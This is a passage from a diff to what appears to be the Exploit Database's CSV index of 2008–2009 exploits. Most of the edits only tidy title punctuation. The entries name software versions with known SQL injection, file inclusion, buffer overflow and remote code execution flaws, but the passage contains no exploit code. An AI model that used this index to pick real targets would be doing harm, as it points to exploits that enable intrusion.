5069,platforms/windows/remote/5069.pl,"dBpowerAMP Audio Player Release 2 M3U File Buffer Overflow Exploit",2008-02-06,securfrog,windows,remote,0 @@ -4762,7 +4762,7 @@ id,file,description,date,author,platform,type,port 5124,platforms/php/webapps/5124.txt,"freePHPgallery 0.6 Cookie Local File Inclusion Vulnerability",2008-02-14,MhZ91,php,webapps,0 5125,platforms/php/webapps/5125.txt,"PHP Live! <= 3.2.2 (questid) Remote SQL Injection Vulnerability",2008-02-14,Xar,php,webapps,0 5126,platforms/php/webapps/5126.txt,"Wordpress Plugin Simple Forum 2.0-2.1 - SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0 -5127,platforms/php/webapps/5127.txt,"Wordpress Plugin Simple Forum 1.10-1.11 SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0 +5127,platforms/php/webapps/5127.txt,"Wordpress Plugin Simple Forum 1.10-1.11 - SQL Injection Vulnerability",2008-02-15,S@BUN,php,webapps,0 5128,platforms/php/webapps/5128.txt,"Mambo Component Quran <= 1.1 (surano) SQL Injection Vulnerability",2008-02-15,Don,php,webapps,0 5129,platforms/php/webapps/5129.txt,"TRUC 0.11.0 (download.php) Remote File Disclosure Vulnerability",2008-02-16,GoLd_M,php,webapps,0 5130,platforms/php/webapps/5130.txt,"AuraCMS 1.62 - Multiple Remote SQL Injection Exploit",2008-02-16,NTOS-Team,php,webapps,0 @@ -4770,7 +4770,7 @@ id,file,description,date,author,platform,type,port 5132,platforms/php/webapps/5132.txt,"Joomla Component jooget <= 2.6.8 - Remote SQL Injection Vulnerability",2008-02-16,S@BUN,php,webapps,0 5133,platforms/php/webapps/5133.txt,"Mambo Component Ricette 1.0 - Remote SQL Injection Vulnerability",2008-02-16,S@BUN,php,webapps,0 5134,platforms/php/webapps/5134.txt,"Joomla Component com_galeria Remote SQL Injection Vulnerability",2008-02-16,S@BUN,php,webapps,0 -5135,platforms/php/webapps/5135.txt,"Wordpress Photo album Remote SQL Injection Vulnerability",2008-02-16,S@BUN,php,webapps,0 +5135,platforms/php/webapps/5135.txt,"Wordpress Photo album Remote - SQL Injection Vulnerability",2008-02-16,S@BUN,php,webapps,0 5136,platforms/php/webapps/5136.txt,"PHPizabi 0.848b C1 HFP1 - Remote File Upload Vulnerability",2008-02-17,ZoRLu,php,webapps,0 5137,platforms/php/webapps/5137.txt,"XPWeb 3.3.2 (Download.php url) Remote File Disclosure Vulnerability",2008-02-17,GoLd_M,php,webapps,0 5138,platforms/php/webapps/5138.txt,"Joomla Component astatsPRO 1.0 refer.php SQL Injection Vulnerability",2008-02-18,ka0x,php,webapps,0 @@ -4829,7 +4829,7 @@ id,file,description,date,author,platform,type,port 5191,platforms/multiple/dos/5191.c,"Apple Mac OS X xnu <= 1228.3.13 - IPv6-ipcomp Remote kernel DoS PoC",2008-02-26,mu-b,multiple,dos,0 5192,platforms/php/webapps/5192.pl,"Nukedit 4.9.x - Remote Create Admin Exploit",2008-02-26,r3dm0v3,php,webapps,0 5193,platforms/windows/remote/5193.html,"D-Link MPEG4 SHM Audio Control (VAPGDecoder.dll 1.7.0.5) BoF Exploit",2008-02-26,rgod,windows,remote,0 -5194,platforms/php/webapps/5194.txt,"Wordpress Plugin Sniplets 1.1.2 (RFI/XSS/RCE) Multiple Vulnerabilities",2008-02-26,NBBN,php,webapps,0 +5194,platforms/php/webapps/5194.txt,"Wordpress Plugin Sniplets 1.1.2 - (RFI/XSS/RCE) Multiple Vulnerabilities",2008-02-26,NBBN,php,webapps,0 5195,platforms/php/webapps/5195.txt,"Mambo Component Simpleboard 1.0.3 (catid) SQL Injection Vulnerability",2008-02-27,"it's my",php,webapps,0 5196,platforms/php/webapps/5196.pl,"EazyPortal <= 1.0 (COOKIE) Remote SQL Injection Exploit",2008-02-27,Iron,php,webapps,0 5197,platforms/php/webapps/5197.txt,"GROUP-E 1.6.41 (head_auth.php) Remote File Inclusion Vulnerability",2008-02-27,CraCkEr,php,webapps,0 @@ -4957,7 +4957,7 @@ id,file,description,date,author,platform,type,port 5323,platforms/php/webapps/5323.pl,"mxBB Module mx_blogs 2.0.0-beta Remote File Inclusion Exploit",2008-03-30,bd0rk,php,webapps,0 5324,platforms/php/webapps/5324.txt,"KISGB <= (tmp_theme) 5.1.1 - Local File Inclusion Vulnerability",2008-03-30,Cr@zy_King,php,webapps,0 5325,platforms/php/webapps/5325.txt,"JShop 1.x - 2.x (page.php xPage) Local File Inclusion Vulnerability",2008-03-30,v0l4arrra,php,webapps,0 -5326,platforms/php/webapps/5326.txt,"Wordpress Plugin Download (dl_id) SQL Injection Vulnerability",2008-03-31,BL4CK,php,webapps,0 +5326,platforms/php/webapps/5326.txt,"Wordpress Plugin Download - (dl_id) SQL Injection Vulnerability",2008-03-31,BL4CK,php,webapps,0 5327,platforms/windows/dos/5327.txt,"Microsoft Windows - Explorer Unspecified .DOC File Denial of Service Exploit",2008-03-31,"Iron Team",windows,dos,0 5328,platforms/php/webapps/5328.txt,"phpSpamManager 0.53b (body.php) Remote File Disclosure Vulnerability",2008-03-31,GoLd_M,php,webapps,0 5329,platforms/php/webapps/5329.txt,"Woltlab Burning Board Addon JGS-Treffen SQL Injection Vulnerability",2008-03-31,N/A,php,webapps,0 @@ -5084,7 +5084,7 @@ id,file,description,date,author,platform,type,port 5451,platforms/windows/remote/5451.py,"BigAnt Server 2.2 - PreAuth Remote SEH Overflow Exploit (0day)",2008-04-15,ryujin,windows,remote,6080 5452,platforms/php/webapps/5452.txt,"lightneasy sqlite / no database <= 1.2.2 - Multiple Vulnerabilities",2008-04-15,girex,php,webapps,0 5453,platforms/windows/dos/5453.pl,"DivX Player <= 6.7.0 SRT File Buffer Overflow PoC",2008-04-15,securfrog,windows,dos,0 -5454,platforms/php/webapps/5454.txt,"Lasernet CMS 1.5 (new) Remote SQL Injection Vulnerability",2008-04-15,cO2,php,webapps,0 +5454,platforms/php/webapps/5454.txt,"Lasernet CMS 1.5 - Remote SQL Injection Vulnerability (2)",2008-04-15,cO2,php,webapps,0 5455,platforms/windows/dos/5455.py,"BS.Player 2.27 Build 959 SRT File Buffer Overflow PoC",2008-04-16,j0rgan,windows,dos,0 5456,platforms/asp/webapps/5456.txt,"carbon communities <= 2.4 - Multiple Vulnerabilities",2008-04-16,BugReport.IR,asp,webapps,0 5457,platforms/php/webapps/5457.txt,"XplodPHP AutoTutorials <= 2.1 (id) SQL Injection Vulnerability",2008-04-16,cO2,php,webapps,0 @@ -5240,7 +5240,7 @@ id,file,description,date,author,platform,type,port 5614,platforms/php/webapps/5614.txt,"Feedback and Rating Script 1.0 (detail.php) SQL Injection Vulnerability",2008-05-14,t0pP8uZz,php,webapps,0 5615,platforms/php/webapps/5615.txt,"AS-GasTracker 1.0.0 Insecure Cookie Handling Vulnerability",2008-05-14,t0pP8uZz,php,webapps,0 5616,platforms/php/webapps/5616.txt,"ActiveKB <= 1.5 Insecure Cookie Handling/Arbitrary Admin Access",2008-05-14,t0pP8uZz,php,webapps,0 -5617,platforms/php/webapps/5617.txt,"Internet Photoshow (Special Edition) Insecure Cookie Handling Vuln",2008-05-14,t0pP8uZz,php,webapps,0 +5617,platforms/php/webapps/5617.txt,"Internet Photoshow (Special Edition) - Insecure Cookie Handling Vuln",2008-05-14,t0pP8uZz,php,webapps,0 5618,platforms/php/webapps/5618.txt,"La-Nai CMS <= 1.2.16 (fckeditor) Arbitrary File Upload Exploit",2008-05-14,EgiX,php,webapps,0 5619,platforms/windows/remote/5619.html,"Microsoft Internet Explorer (Print Table of Links) Cross-Zone Scripting PoC",2008-05-14,"Aviv Raff",windows,remote,0 5620,platforms/php/webapps/5620.txt,"rgboard <= 3.0.12 (rfi/XSS) Multiple Vulnerabilities",2008-05-14,e.wiZz!,php,webapps,0 @@ -5324,7 +5324,7 @@ id,file,description,date,author,platform,type,port 5699,platforms/php/webapps/5699.txt,"PsychoStats <= 2.3.3 - Multiple Remote SQL Injection Vulnerabilities",2008-05-31,Mr.SQL,php,webapps,0 5700,platforms/php/webapps/5700.htm,"CMSimple 3.1 - Local File Inclusion / Arbitrary File Upload Exploit",2008-05-31,irk4z,php,webapps,0 5701,platforms/php/webapps/5701.txt,"Social Site Generator (sgc_id) Remote SQL Injection Vulnerability",2008-05-31,"DeAr Ev!L",php,webapps,0 -5702,platforms/php/webapps/5702.txt,"Azuresites CMS- Multiple Vulnerabilities",2008-05-31,Lidloses_Auge,php,webapps,0 +5702,platforms/php/webapps/5702.txt,"Azuresites CMS - Multiple Vulnerabilities",2008-05-31,Lidloses_Auge,php,webapps,0 5703,platforms/php/webapps/5703.txt,"PHP Visit Counter <= 0.4 (datespan) SQL Injection Vulnerability",2008-05-31,Lidloses_Auge,php,webapps,0 5704,platforms/php/webapps/5704.txt,"PassWiki <= 0.9.16 RC3 (site_id) Local File Inclusion Vulnerability",2008-05-31,mozi,php,webapps,0 5705,platforms/asp/webapps/5705.txt,"BP Blog 6.0 (id) Remote Blind SQL Injection Vulnerability",2008-05-31,JosS,asp,webapps,0 @@ -5804,7 +5804,7 @@ id,file,description,date,author,platform,type,port 6190,platforms/php/webapps/6190.txt,"phsBlog 0.1.1 - Multiple Remote SQL Injection Vulnerabilities",2008-08-01,cOndemned,php,webapps,0 6191,platforms/php/webapps/6191.txt,"e-vision CMS <= 2.02 (sql/upload/ig) Multiple Vulnerabilities",2008-08-02,IRCRASH,php,webapps,0 6192,platforms/php/webapps/6192.txt,"k-links directory (sql/XSS) Multiple Vulnerabilities",2008-08-02,Corwin,php,webapps,0 -6193,platforms/php/webapps/6193.txt,"E-Store Kit- <= 2 PayPal Edition (pid) SQL Injection Vulnerability",2008-08-02,Mr.SQL,php,webapps,0 +6193,platforms/php/webapps/6193.txt,"E-Store Kit- <= 2 PayPal Edition - (pid) SQL Injection Vulnerability",2008-08-02,Mr.SQL,php,webapps,0 6194,platforms/php/webapps/6194.pl,"moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit",2008-08-02,Ams,php,webapps,0 6195,platforms/windows/remote/6195.c,"IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit",2008-08-03,r0ut3r,windows,remote,0 6196,platforms/hardware/dos/6196.pl,"Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit",2008-08-03,crit3rion,hardware,dos,0 @@ -5915,7 +5915,7 @@ id,file,description,date,author,platform,type,port 6327,platforms/windows/dos/6327.html,"Najdi.si Toolbar ActiveX Remote Buffer Overflow PoC",2008-08-29,shinnai,windows,dos,0 6328,platforms/solaris/remote/6328.c,"Sun Solaris <= 10 snoop(1M) Utility Remote Exploit",2008-08-29,Andi,solaris,remote,0 6329,platforms/windows/local/6329.pl,"Acoustica MP3 CD Burner 4.51 Build 147 (asx file) Local BoF Exploit",2008-08-29,Koshi,windows,local,0 -6330,platforms/windows/dos/6330.txt,"Micrsoft Windows GDI -(CreateDIBPatternBrushPt) Heap Overflow PoC",2008-08-29,Ac!dDrop,windows,dos,0 +6330,platforms/windows/dos/6330.txt,"Micrsoft Windows GDI - (CreateDIBPatternBrushPt) Heap Overflow PoC",2008-08-29,Ac!dDrop,windows,dos,0 6332,platforms/php/webapps/6332.txt,"brim 2.0.0 (sql/XSS) Multiple Vulnerabilities",2008-08-30,InjEctOr5,php,webapps,0 6333,platforms/windows/local/6333.pl,"Acoustica Beatcraft 1.02 Build 19 (bcproj file) Local BoF Exploit",2008-08-30,Koshi,windows,local,0 6334,platforms/windows/remote/6334.html,"Friendly Technologies Read/Write Registry/Read Files Exploit",2008-08-30,spdr,windows,remote,0 @@ -5976,7 +5976,7 @@ id,file,description,date,author,platform,type,port 6394,platforms/hardware/dos/6394.pl,"Samsung DVR SHR2040 HTTPD Remote Denial of Service DoS PoC",2008-09-07,"Alex Hernandez",hardware,dos,0 6395,platforms/php/webapps/6395.txt,"Masir Camp E-Shop Module <= 3.0 (ordercode) SQL Injection Vuln",2008-09-07,BugReport.IR,php,webapps,0 6396,platforms/php/webapps/6396.txt,"Alstrasoft Forum (cat) Remote SQL Injection Vulnerability",2008-09-07,r45c4l,php,webapps,0 -6397,platforms/php/webapps/6397.txt,"Wordpress 2.6.1 SQL Column Truncation Vulnerability",2008-09-07,irk4z,php,webapps,0 +6397,platforms/php/webapps/6397.txt,"Wordpress 2.6.1 - SQL Column Truncation Vulnerability",2008-09-07,irk4z,php,webapps,0 6398,platforms/php/webapps/6398.txt,"E-Shop Shopping Cart Script (search_results.php) SQL Injection Vuln",2008-09-07,Mormoroth,php,webapps,0 6401,platforms/php/webapps/6401.txt,"Alstrasoft Forum (catid) Remote SQL Injection Vulnerability",2008-09-09,r45c4l,php,webapps,0 6402,platforms/php/webapps/6402.txt,"Stash 1.0.3 - Multiple SQL Injection Vulnerabilities",2008-09-09,IRCRASH,php,webapps,0 @@ -5996,7 +5996,7 @@ id,file,description,date,author,platform,type,port 6417,platforms/php/webapps/6417.txt,"Availscript Jobs Portal Script (jid) SQL Injection Vulnerability (auth)",2008-09-10,InjEctOr5,php,webapps,0 6419,platforms/php/webapps/6419.txt,"Zanfi CMS lite / Jaw Portal free (fckeditor) Arbitrary File Upload Vuln",2008-09-10,reptil,php,webapps,0 6420,platforms/asp/webapps/6420.txt,"aspwebalbum 3.2 - Multiple Vulnerabilities",2008-09-10,e.wiZz!,asp,webapps,0 -6421,platforms/php/webapps/6421.php,"Wordpress 2.6.1 (SQL Column Truncation) Admin Takeover Exploit",2008-09-10,iso^kpsbr,php,webapps,0 +6421,platforms/php/webapps/6421.php,"Wordpress 2.6.1 - (SQL Column Truncation) Admin Takeover Exploit",2008-09-10,iso^kpsbr,php,webapps,0 6422,platforms/php/webapps/6422.txt,"phpvid 1.1 (xss/SQL) Multiple Vulnerabilities",2008-09-10,r45c4l,php,webapps,0 6423,platforms/php/webapps/6423.txt,"Zanfi CMS lite / Jaw Portal free (page) SQL Injection Vulnerability",2008-09-10,Cru3l.b0y,php,webapps,0 6424,platforms/windows/dos/6424.html,"Adobe Acrobat 9 - ActiveX Remote Denial of Service Exploit",2008-09-11,"Jeremy Brown",windows,dos,0 @@ -6050,7 +6050,7 @@ id,file,description,date,author,platform,type,port 6474,platforms/windows/dos/6474.rb,"WonderWare SuiteLink 2.0 - Remote Denial of Service Exploit (meta)",2008-09-17,"belay tows",windows,dos,0 6475,platforms/php/webapps/6475.txt,"PHP Crawler 0.8 (footer) Remote File Inclusion Vulnerability",2008-09-17,Piker,php,webapps,0 6476,platforms/hardware/remote/6476.html,"Cisco Router HTTP Administration CSRF Command Execution Exploit",2008-09-17,"Jeremy Brown",hardware,remote,0 -6477,platforms/hardware/remote/6477.html,"Cisco Router HTTP Administration CSRF Command Execution Exploit 2",2008-09-17,"Jeremy Brown",hardware,remote,0 +6477,platforms/hardware/remote/6477.html,"Cisco Router - HTTP Administration CSRF Command Execution Exploit (2)",2008-09-17,"Jeremy Brown",hardware,remote,0 6478,platforms/php/webapps/6478.txt,"Technote 7 (shop_this_skin_path) Remote File Inclusion Vulnerability",2008-09-17,webDEViL,php,webapps,0 6480,platforms/php/webapps/6480.txt,"x10media mp3 - search engine 1.5.5 - Remote File Inclusion Vulnerability",2008-09-17,THUNDER,php,webapps,0 6481,platforms/php/webapps/6481.c,"Femitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC",2008-09-17,LiquidWorm,php,webapps,0 @@ -6101,7 +6101,7 @@ id,file,description,date,author,platform,type,port 6527,platforms/php/webapps/6527.txt,"BuzzyWall <= 1.3.1 (search.php search) SQL Injection Vulnerability",2008-09-22,~!Dok_tOR!~,php,webapps,0 6528,platforms/php/webapps/6528.txt,"WCMS 1.0b (news_detail.asp id) Remote SQL Injection Vulnerability",2008-09-22,"CWH Underground",php,webapps,0 6529,platforms/php/webapps/6529.php,"WSN Links Free 4.0.34P (comments.php) Blind SQL Injection Exploit",2008-09-22,Stack,php,webapps,0 -6530,platforms/php/webapps/6530.txt,"OpenElec <= 3.01- (form.php obj) Local File Inclusion Vulnerability",2008-09-22,dun,php,webapps,0 +6530,platforms/php/webapps/6530.txt,"OpenElec <= 3.01 - (form.php obj) Local File Inclusion Vulnerability",2008-09-22,dun,php,webapps,0 6531,platforms/php/webapps/6531.txt,"MyBlog <= 0.9.8 Insecure Cookie Handling Vulnerability",2008-09-22,Pepelux,php,webapps,0 6532,platforms/hardware/remote/6532.py,"Sagem Routers F@ST Remote CSRF Exploit (dhcp hostname attack)",2008-09-22,Zigma,hardware,remote,0 6533,platforms/php/webapps/6533.txt,"basebuilder <= 2.0.1 (main.inc.php) Remote File Inclusion Vulnerability",2008-09-22,dun,php,webapps,0 @@ -6342,7 +6342,7 @@ id,file,description,date,author,platform,type,port 6774,platforms/windows/remote/6774.html,"Hummingbird Deployment Wizard 2008 Registry Values Creation/Change",2008-10-17,shinnai,windows,remote,0 6775,platforms/solaris/dos/6775.c,"Solaris 9 PortBind XDR-DECODE taddr2uaddr() Remote DoS Exploit",2008-10-17,"Federico L. Bossi Bonin",solaris,dos,0 6776,platforms/windows/remote/6776.html,"Hummingbird Deployment Wizard 2008 - ActiveX File Execution(2)",2008-10-17,shinnai,windows,remote,0 -6777,platforms/php/webapps/6777.txt,"Wordpress Plugin st_newsletter (stnl_iframe.php) SQL Injection Vuln",2008-10-17,r45c4l,php,webapps,0 +6777,platforms/php/webapps/6777.txt,"Wordpress Plugin st_newsletter - (stnl_iframe.php) SQL Injection Vuln",2008-10-17,r45c4l,php,webapps,0 6778,platforms/php/webapps/6778.pl,"XOOPS Module GesGaleri (kategorino) Remote SQL Injection Exploit",2008-10-18,EcHoLL,php,webapps,0 6779,platforms/php/webapps/6779.txt,"phpFastNews 1.0.0 Insecure Cookie Handling Vulnerability",2008-10-18,Qabandi,php,webapps,0 6780,platforms/php/webapps/6780.txt,"zeeproperty (adid) Remote SQL Injection Vulnerability",2008-10-18,"Hussin X",php,webapps,0 @@ -6405,7 +6405,7 @@ id,file,description,date,author,platform,type,port 6839,platforms/php/webapps/6839.txt,"PozScripts Classified Auctions (gotourl.php id) SQL Injection Vuln",2008-10-26,"Hussin X",php,webapps,0 6840,platforms/windows/remote/6840.html,"PowerTCP FTP module Multiple Technique Exploit (SEH/HeapSpray)",2008-10-26,"Shahriyar Jalayeri",windows,remote,0 6841,platforms/windows/remote/6841.txt,"Microsoft Windows Server - Code Execution Exploit (MS08-067) (Univ)",2008-10-26,EMM,windows,remote,135 -6842,platforms/php/webapps/6842.txt,"WordPress Media Holder (mediaHolder.php id) SQL Injection Vuln",2008-10-26,boom3rang,php,webapps,0 +6842,platforms/php/webapps/6842.txt,"WordPress Media Holder - (mediaHolder.php id) SQL Injection Vuln",2008-10-26,boom3rang,php,webapps,0 6843,platforms/php/webapps/6843.txt,"SFS Ez Forum (forum.php id) SQL Injection Vulnerability",2008-10-26,Hurley,php,webapps,0 6844,platforms/php/webapps/6844.pl,"MyForum 1.3 (lecture.php id) Remote SQL Injection Exploit",2008-10-26,Vrs-hCk,php,webapps,0 6845,platforms/cgi/webapps/6845.txt,"Ads Pro (dhtml.pl page) Remote Command Execution Exploit",2008-10-26,S0l1D,cgi,webapps,0 @@ -6981,7 +6981,7 @@ id,file,description,date,author,platform,type,port 7437,platforms/php/webapps/7437.txt,"Moodle 1.9.3 - Remote Code Execution Vulnerability",2008-12-12,USH,php,webapps,0 7438,platforms/asp/webapps/7438.txt,"VP-ASP Shopping Cart 6.50 Database Disclosure Vulnerability",2008-12-12,Dxil,asp,webapps,0 7439,platforms/php/webapps/7439.txt,"Umer Inc Songs Portal Script (id) SQL Injection Vulnerability",2008-12-12,InjEctOr5,php,webapps,0 -7440,platforms/asp/webapps/7440.txt,"ColdFusion Scripts Red_Reservations Database Disclosure Vulnerability",2008-12-12,Cyber-Zone,asp,webapps,0 +7440,platforms/asp/webapps/7440.txt,"ColdFusion Scripts Red_Reservations - Database Disclosure Vulnerability",2008-12-12,Cyber-Zone,asp,webapps,0 7441,platforms/php/webapps/7441.txt,"joomla live chat (sql/proxy) Multiple Vulnerabilities",2008-12-12,jdc,php,webapps,0 7442,platforms/windows/remote/7442.txt,"TmaxSoft JEUS Alternate Data Streams File Disclosure Vulnerability",2008-12-12,"Simon Ryeo",windows,remote,0 7443,platforms/php/webapps/7443.txt,"FlexPHPNews 0.0.6 & PRO (Auth Bypass) SQL Injection Vulnerability",2008-12-14,Osirys,php,webapps,0 @@ -7128,7 +7128,7 @@ id,file,description,date,author,platform,type,port 7585,platforms/windows/dos/7585.txt,"Microsoft Windows Media Player - (.WAV) Remote Crash PoC",2008-12-28,"laurent gaffié ",windows,dos,0 7586,platforms/php/webapps/7586.txt,"Miniweb 2.0 (Auth Bypass) SQL Injection Vulnerability",2008-12-28,bizzit,php,webapps,0 7587,platforms/php/webapps/7587.txt,"Joomla Component PAX Gallery 0.1 - Blind SQL Injection Vulnerability",2008-12-28,XaDoS,php,webapps,0 -7589,platforms/windows/dos/7589.pl,"BulletProof FTP Client - (.bps ) Local Stack Overflow PoC",2008-12-28,Stack,windows,dos,0 +7589,platforms/windows/dos/7589.pl,"BulletProof FTP Client - (.bps) Local Stack Overflow PoC",2008-12-28,Stack,windows,dos,0 7592,platforms/windows/dos/7592.pl,"Hex Workshop 5.1.4 (Color Mapping File) Local Buffer Overflow PoC",2008-12-28,"Encrypt3d.M!nd ",windows,dos,0 7593,platforms/php/webapps/7593.pl,"DeluxeBB <= 1.2 - Remote Blind SQL Injection Exploit",2008-12-28,StAkeR,php,webapps,0 7594,platforms/windows/remote/7594.html,"Chilkat FTP ActiveX (SaveLastError) Insecure Method Exploit",2008-12-28,callAX,windows,remote,0 @@ -7247,7 +7247,7 @@ id,file,description,date,author,platform,type,port 7707,platforms/windows/local/7707.py,"IntelliTamper (2.07/2.08) Language Catalog SEH Overflow Exploit",2009-01-08,Cnaph,windows,local,0 7708,platforms/windows/dos/7708.pl,"MP3 TrackMaker 1.5 - (.mp3) Local Heap Overflow PoC",2009-01-09,Houssamix,windows,dos,0 7709,platforms/windows/dos/7709.pl,"VUPlayer 2.49 - (.asx) (HREF) Local Buffer Overflow PoC",2009-01-09,"aBo MoHaMeD",windows,dos,0 -7710,platforms/windows/dos/7710.html,"Microsoft Internet Explorer JavaScript screen[ ] Denial of Service Exploit",2009-01-09,Skylined,windows,dos,0 +7710,platforms/windows/dos/7710.html,"Microsoft Internet Explorer - JavaScript screen[ ] Denial of Service Exploit",2009-01-09,Skylined,windows,dos,0 7711,platforms/php/webapps/7711.txt,"Fast FAQs System (Auth Bypass) SQL Injection Vulnerability",2009-01-09,x0r,php,webapps,0 7712,platforms/hardware/remote/7712.txt,"Netgear WG102 Leaks SNMP write password with read access",2009-01-09,"Harm S.I. Vaittes",hardware,remote,0 7713,platforms/windows/local/7713.pl,"VUPlayer 2.49 - (.asx) (HREF) Local Buffer Overflow Exploit (2)",2009-01-09,Houssamix,windows,local,0 @@ -7388,7 +7388,7 @@ id,file,description,date,author,platform,type,port 7850,platforms/asp/webapps/7850.txt,"asp-project 1.0 Insecure Cookie Method Vulnerability",2009-01-22,IRCRASH,asp,webapps,0 7851,platforms/php/webapps/7851.php,"Pardal CMS <= 0.2.0 - Blind SQL Injection Exploit",2009-01-22,darkjoker,php,webapps,0 7852,platforms/windows/dos/7852.pl,"FTPShell Server 4.3 (licence key) Remote Buffer Overflow PoC",2009-01-22,LiquidWorm,windows,dos,0 -7853,platforms/windows/local/7853.pl,"EleCard MPEG PLAYER - (.m3u ) Local Stack Overflow Exploit",2009-01-25,AlpHaNiX,windows,local,0 +7853,platforms/windows/local/7853.pl,"EleCard MPEG PLAYER - (.m3u) Local Stack Overflow Exploit",2009-01-25,AlpHaNiX,windows,local,0 7854,platforms/windows/dos/7854.pl,"MediaMonkey 3.0.6 - (.m3u) Local Buffer Overflow PoC",2009-01-25,AlpHaNiX,windows,dos,0 7855,platforms/linux/local/7855.txt,"PostgreSQL 8.2/8.3/8.4 UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local,0 7856,platforms/linux/local/7856.txt,"MySQL 4/5/6 - UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local,0 @@ -7444,7 +7444,7 @@ id,file,description,date,author,platform,type,port 7909,platforms/php/webapps/7909.txt,"Coppermine Photo Gallery 1.4.19 - Remote PHP File Upload Vulnerability",2009-01-29,"Michael Brooks",php,webapps,0 7910,platforms/windows/remote/7910.html,"WOW - Web On Windows ActiveX Control 2 - Remote Code Execution",2009-01-29,"Michael Brooks",windows,remote,0 7911,platforms/php/webapps/7911.txt,"GLPI 0.71.3 - Multiple Remote SQL Injection VUlnerabilities",2009-01-29,Zigma,php,webapps,0 -7912,platforms/windows/remote/7912.txt,"Internet Explorer 7 ClickJacking Vulnerability (2009-01-23)",2009-01-29,UzmiX,windows,remote,0 +7912,platforms/windows/remote/7912.txt,"Microsoft Internet Explorer 7 - ClickJacking Vulnerability",2009-01-29,UzmiX,windows,remote,0 7913,platforms/windows/remote/7913.pl,"WFTPD Explorer Pro 1.0 - Remote Heap Overflow Exploit",2009-01-29,SkD,windows,remote,21 7915,platforms/hardware/remote/7915.txt,"Motorola Wimax modem CPEi300 (FD/XSS) Multiple Vulnerabilities",2009-01-29,"Usman Saeed",hardware,remote,0 7916,platforms/php/webapps/7916.txt,"NetArtMedia Car Portal 1.0 (Auth Bypass) SQL Injection Vulnerability",2009-01-29,"Mehmet Ince",php,webapps,0 @@ -7739,7 +7739,7 @@ id,file,description,date,author,platform,type,port 8226,platforms/php/webapps/8226.txt,"PHPRunner 4.2 (SearchOption) Blind SQL Injection Vulnerability",2009-03-17,BugReport.IR,php,webapps,0 8227,platforms/windows/remote/8227.pl,"Talkative IRC 0.4.4.16 - Remote Stack Overflow Exploit (SEH)",2009-03-17,LiquidWorm,windows,remote,0 8228,platforms/php/webapps/8228.txt,"GDL 4.x - (node) Remote SQL Injection Vulnerability",2009-03-17,g4t3w4y,php,webapps,0 -8229,platforms/php/webapps/8229.txt,"Wordpress Plugin fMoblog 2.1 (id) SQL Injection Vulnerability",2009-03-17,"strange kevin",php,webapps,0 +8229,platforms/php/webapps/8229.txt,"Wordpress Plugin fMoblog 2.1 - (id) SQL Injection Vulnerability",2009-03-17,"strange kevin",php,webapps,0 8230,platforms/php/webapps/8230.txt,"Mega File Hosting Script 1.2 (cross.php url) RFI Vulnerability",2009-03-17,Garry,php,webapps,0 8231,platforms/windows/local/8231.php,"CDex 1.70b2 - (.ogg) Local Buffer Overflow Exploit (xp/ sp3)",2009-03-18,Nine:Situations:Group,windows,local,0 8232,platforms/windows/dos/8232.py,"Chasys Media Player 1.1 - (.pls) Local Buffer Overflow PoC (SEH)",2009-03-18,zAx,windows,dos,0 @@ -7908,12 +7908,12 @@ id,file,description,date,author,platform,type,port 8398,platforms/windows/remote/8398.php,"ftpdmin 0.96 RNFR Remote Buffer Overflow Exploit (xp sp3/case study)",2009-04-13,surfista,windows,remote,21 8399,platforms/php/webapps/8399.pl,"Flatnuke <= 2.7.1 (level) Remote Privilege Escalation Exploit",2009-04-13,StAkeR,php,webapps,0 8401,platforms/windows/local/8401.cpp,"HTML Email Creator <= 2.1b668 (html) Local SEH Overwrite Exploit",2009-04-13,dun,windows,local,0 -8402,platforms/windows/dos/8402.pl,"Mini-stream Ripper - (.M3U ) Local Stack Overflow PoC",2009-04-13,Cyber-Zone,windows,dos,0 -8403,platforms/windows/dos/8403.pl,"WM Downloader - (.M3U ) Local Stack Overflow PoC",2009-04-13,Cyber-Zone,windows,dos,0 -8404,platforms/windows/dos/8404.pl,"RM Downloader - (.M3U ) Local Stack Overflow PoC",2009-04-13,Cyber-Zone,windows,dos,0 -8405,platforms/windows/dos/8405.pl,"Mini-stream RM-MP3 Converter - (.M3U ) Local Stack Overflow PoC",2009-04-13,Cyber-Zone,windows,dos,0 +8402,platforms/windows/dos/8402.pl,"Mini-stream Ripper - (.M3U) Local Stack Overflow PoC",2009-04-13,Cyber-Zone,windows,dos,0 +8403,platforms/windows/dos/8403.pl,"WM Downloader - (.M3U) Local Stack Overflow PoC",2009-04-13,Cyber-Zone,windows,dos,0 +8404,platforms/windows/dos/8404.pl,"RM Downloader - (.M3U) Local Stack Overflow PoC",2009-04-13,Cyber-Zone,windows,dos,0 +8405,platforms/windows/dos/8405.pl,"Mini-stream RM-MP3 Converter - (.M3U) Local Stack Overflow PoC",2009-04-13,Cyber-Zone,windows,dos,0 8406,platforms/openbsd/dos/8406.txt,"OpenBSD <= 4.5 (IP datagrams) Remote DoS Vulnerability",2009-04-13,Rembrandt,openbsd,dos,0 -8407,platforms/windows/dos/8407.pl,"ASX to MP3 Converter - (.M3U ) Local Stack Overflow PoC",2009-04-13,Cyber-Zone,windows,dos,0 +8407,platforms/windows/dos/8407.pl,"ASX to MP3 Converter - (.M3U) Local Stack Overflow PoC",2009-04-13,Cyber-Zone,windows,dos,0 8408,platforms/php/webapps/8408.txt,"X10Media Mp3 - Search Engine < 1.6.2 Admin Access Vulnerability",2009-04-13,THUNDER,php,webapps,0 8409,platforms/php/webapps/8409.txt,"Yellow Duck Weblog 2.1.0 (lang) Local File Inclusion Vulnerability",2009-04-13,ahmadbady,php,webapps,0 8410,platforms/windows/local/8410.pl,"RM Downloader 3.0.0.9 - (.m3u) Universal Stack Overflow Exploit",2009-04-13,Stack,windows,local,0 @@ -7932,7 +7932,7 @@ id,file,description,date,author,platform,type,port 8423,platforms/php/webapps/8423.txt,"Jamroom (index.php t) Local File Inclusion Vulnerability",2009-04-14,zxvf,php,webapps,0 8424,platforms/php/webapps/8424.txt,"ablespace 1.0 (xss/bsql) Multiple Vulnerabilities",2009-04-14,DSecRG,php,webapps,0 8425,platforms/php/webapps/8425.txt,"php-revista 1.1.2 (rfi/sqli/cb/XSS) Multiple 